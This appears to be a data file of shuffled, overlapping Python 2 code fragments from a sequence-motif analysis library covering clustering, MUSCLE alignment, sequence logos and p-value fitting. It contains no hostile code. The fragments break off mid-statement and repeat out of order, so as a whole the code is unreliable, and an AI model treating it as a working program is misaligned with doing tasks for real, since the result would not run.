"multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs)",
"in a cluster with enough space that # kmers dont interfere cluster_seqs =",
"seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\"",
"model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None,",
"None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality,",
"> similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10,",
"locs = [] for h, s in haystack: for match in re.finditer(needle, s):",
"params['diags'] = True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline =",
"to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200):",
"plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname",
"code.append(letter) if len(code) == 0: code_str = None elif len(code) == 1: code_str",
"block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e:",
"= self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining:",
"random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs,",
"return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines:",
"% (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show()",
"self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet ==",
"scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines: if",
"seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\"",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray,",
"motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type))",
"%d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix)",
"regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname,",
"seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers",
"vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed",
"i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score",
"(e - s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc",
"[] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices",
"> i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1)",
"from itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model",
"clusters: start_time = time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id],",
"n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs,",
"time.time() preds = [] binary_preds = [] true_targets = [] for i, (p,",
"seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays:",
"logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal",
"+ url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return",
"motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f'",
"vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time()",
"(score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items +=",
"return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for",
"i != j: # find closest instance j from any instance in i",
"time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item",
"zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet",
"metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:,",
"= [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable,",
"= maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif",
"= defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives'",
"seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters",
"'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return",
"+= '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>'",
"neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix",
"= np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign =",
"sigs = None for scores in smod.score(seqs): sig = np.array(scores) if len(sig) !=",
"= mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer))",
"d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta:",
"i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle,",
"aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def",
"txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"'",
"logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in",
"id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self,",
"subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working",
"+ len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives,",
"- s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc =",
"fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds,",
"len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle,",
"ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id for cluster_id",
"SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300,",
"code_str = None elif len(code) == 1: code_str = code[0] else: code_str =",
"vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' %",
"for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id",
"seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs)",
"in seqs]) sigs = None for scores in smod.score(seqs): sig = np.array(scores) if",
"min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs",
"random import pylab as plt import joblib from scipy.optimize import curve_fit import multiprocessing",
"0: code_str = None elif len(code) == 1: code_str = code[0] else: code_str",
"clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self,",
"# it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\"",
"[c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster)",
"+ (e - s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50)",
"> sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs)",
"half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for h, s",
"= '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname =",
"on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet",
"pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds,",
"'(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster =",
"range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs)",
"min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters",
"self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True,",
"n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"# TODO: check if this alphabet is required # it over-rides tool.alphabet alphabet='dna',",
"from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import",
"motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id,",
"n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async(",
"instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case",
"dim >= min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq in",
"gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c =",
"avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s",
"time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix =",
"nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack:",
"c = Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val =",
"= '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id,",
"if score >= min_score and len(align_seqs) > min_cluster_size: return True else: return False",
"txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info",
"# seperating headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord =",
"row[i] if norm != 0: row /= norm else: row = np.zeros(row.shape) row[i]",
"\"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end,",
"return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna')",
"figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\"",
"motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices =",
"enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0]",
"c = Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l:",
"# classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except",
"motives[j] success = True if success is False: break # TODO: run the",
"sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from Bio",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds",
"- y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x)",
"else: code_str = '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th):",
"self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances,",
"motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10,",
"cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin",
"= [] for i in range(n): it = iterable.next() items.append(it) yield items def",
"= np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances",
"else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances =",
"[-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes)",
"= None elif len(code) == 1: code_str = code[0] else: code_str = '('",
"b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) / b)) class",
"seqs]) sigs = None for scores in smod.score(seqs): sig = np.array(scores) if len(sig)",
"------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self,",
"motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = []",
"half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig",
"import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import",
"= self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs,",
"= counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std",
"yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for",
"motives[i] = motif del motives[j] success = True if success is False: break",
"ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']: tokens =",
"# vectorize the seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs)",
"%d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds):",
"% (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0)",
"self.a, self.b) p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative",
"freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None):",
"d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j in",
"haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s",
"for h, s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs,",
"id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\"",
"mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)]",
"logo for input sequences.\"\"\" # seperate headers headers, instances = [list(x) for x",
"= {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True,",
"def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) -",
"block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items",
"headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord = [] for i,",
"in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs,",
"enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self,",
"min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq':",
"== 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p",
"for h, s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield",
"a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a,",
"of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', #",
"y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time()",
"def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 -",
"to learn the new class definition logger.debug('After merge, %d motives' % len(motives)) return",
"similarity_th=0.8): for i in motives: for j in motives: if j > i:",
"avg_loc = -1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\"",
"'\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self,",
"h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i)",
"i in range(len(ids) - 1): start = ids[i] end = ids[i + 1]",
"- average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type))",
"# find closest instance j from any instance in i d_ij = []",
"sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod,",
"wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt =",
"scores = p.get() scores_items += scores d_time = time.time() - start_time d_loc_time =",
"estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line =",
"= mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable,",
"= MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out",
">= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs = sigs",
"for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type",
"def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\"",
"scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d",
"= time.time() matrices = [] for i, p in enumerate(results): loc_start_time = time.time()",
"%s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq']",
"> regex_th: if letter != '-': code.append(letter) if len(code) == 0: code_str =",
"\"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] =",
"or freq >= freq_th: if std_th is None or std <= std_th: _motives[cluster_id]",
"self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x)",
"+ 1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores:",
"wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4,",
"d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1):",
"= n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix,",
"ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300,",
"norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances,",
"estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header,",
"{'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif",
"ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def fit(self,",
"[id for id in motives] seqs_summary = defaultdict(list) for seq_id, begin, end, i",
"s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield 1 else:",
"+ fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17,",
"alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3,",
"in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score =",
"len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id",
"\"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else: pool",
"std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in",
"ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer",
"%s (%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return",
"header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header,",
"subseq except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for",
"interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) > 0: seqs",
"range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig",
"from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl",
"s in haystack: for match in re.finditer(needle, s): s = match.start() e =",
"in i d_ij = [] for c_i in centers[i]: for c_j in centers[j]:",
"= wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays: %d' %",
"bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname def extract_location(needle,",
"seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper",
"begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size",
"None: if len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len:",
"= popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values'",
"distances[(cluster_id, j)] info = ' - num co-occurences %d %s vs %d %s:",
"alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data =",
"clusters: raise Exception('Error: No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for",
"width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width))",
"= Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio)",
"1 - y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences =",
"seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17,",
"= cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s",
"np.sort(x) ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def",
"\"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th,",
"orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size,",
"pool.join() data_matrix = vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100,",
"+ '\" style=\"width: 100%\"></p>') else: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' +",
"for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm != 0: row",
"= c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code += l return",
"ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False",
"2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives: _,",
"stdout = self._perform_ma(data) aligned_seqs = self._fasta_to_seqs(headers, stdout) return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object):",
"for i in motives], reverse=True): info = '#### Motif id: %d' % cluster_id",
"in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting') start_time =",
"it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags",
"in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2))",
"= metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion matrix:') logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) #",
"= estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time",
"logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p in enumerate(results): loc_start_time",
